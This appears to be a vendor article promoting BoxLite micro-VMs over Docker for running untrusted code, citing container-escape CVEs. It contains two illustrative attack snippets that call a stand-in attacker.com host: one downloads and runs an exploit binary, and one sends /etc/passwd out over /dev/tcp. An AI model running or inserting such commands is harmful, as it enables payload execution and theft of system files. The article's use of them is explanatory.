TL;DR: Docker containers share the host kernel, and container escape vulnerabilities are discovered regularly. For trusted workloads you control, this risk is acceptable. For untrusted code (AI-generated, user-submitted), container escapes could be catastrophic. Hardware-isolated micro-VMs provide stronger guarantees.
Docker and other container runtimes use Linux kernel features for isolation:
Together, these create a strong isolation boundary—for trusted workloads.
All containers share the host kernel. The Linux kernel has:
Any vulnerability in these subsystems can potentially be exploited from inside a container to escape to the host.
Container escapes aren’t theoretical. Here are some notable examples:
CVE-2024-21626 (runc, January 2024)
/proc/self/fd handling during container creationCVE-2020-15257 (containerd, November 2020)
CVE-2019-5736 (runc, February 2019)
CVE-2022-0185 (Linux kernel, January 2022)
Container runtimes are designed assuming you trust the code. The isolation protects against:
They’re not designed to contain actively malicious code trying to escape.
AI agents generate code that you didn’t write and can’t fully predict:
# AI agent might generate something like this
import subprocess
subprocess.run(["curl", "-o", "/dev/shm/x", "http://attacker.com/exploit"])
subprocess.run(["chmod", "+x", "/dev/shm/x"])
subprocess.run(["/dev/shm/x"]) # Runs exploit targeting container escape
Online judges, coding tutorials, and playgrounds run arbitrary user code:
# User submits this "solution"
__import__('os').system('cat /etc/passwd > /dev/tcp/attacker.com/1234')
When customer code runs on your infrastructure, a container escape means:
Some argue you can harden containers sufficiently:
These help. But they’re all layers on top of the fundamental shared-kernel architecture. Zero-days in the kernel bypass all of them.
Virtual machines provide a fundamentally different isolation boundary:
Container Model:
┌─────────────┬─────────────┐
│ Container A │ Container B │
├─────────────┴─────────────┤
│ Host Kernel │ ← Shared!
├───────────────────────────┤
│ Hardware │
└───────────────────────────┘
VM Model:
┌─────────────┬─────────────┐
│ VM A │ VM B │
│ (Kernel A) │ (Kernel B) │ ← Separate!
├─────────────┴─────────────┤
│ Hypervisor (KVM/HV) │ ← Tiny attack surface
├───────────────────────────┤
│ Hardware │
└───────────────────────────┘
Traditional VMs:
This made VMs impractical for the container use case.
Micro-VMs like those used by BoxLite provide:
import boxlite
# This runs in a hardware-isolated VM, not a container
async with boxlite.SimpleBox("python:slim") as box:
result = await box.exec("python", "-c", untrusted_code)
| Scenario | Recommendation |
|---|---|
| Your own microservices | Containers (Docker, Kubernetes) |
| CI/CD pipelines (your code) | Containers |
| AI agent code execution | Micro-VMs (BoxLite) |
| User-submitted code | Micro-VMs (BoxLite) |
| Multi-tenant customer code | Micro-VMs (BoxLite) |
| Compliance-sensitive workloads | Micro-VMs or traditional VMs |
If you’re currently using Docker for untrusted code:
Before (Docker):
import subprocess
def run_user_code(code):
subprocess.run([
"docker", "run", "--rm",
"--network=none",
"--cap-drop=ALL",
"python:slim",
"python", "-c", code
])
After (BoxLite):
import boxlite
async def run_user_code(code):
async with boxlite.SimpleBox("python:slim") as box:
result = await box.exec("python", "-c", code)
return result.stdout
Same workflow, stronger isolation.
Docker containers are excellent for deploying trusted applications. They’re fast, efficient, and well-understood.
But when running untrusted code—AI-generated scripts, user submissions, customer workloads—container isolation isn’t strong enough. The shared kernel creates a risk that can’t be fully mitigated.
Hardware-isolated micro-VMs provide the isolation guarantees you need without sacrificing the developer experience. For untrusted code, use VM isolation.
Learn more about BoxLite’s isolation model in the FAQ or comparison with Docker.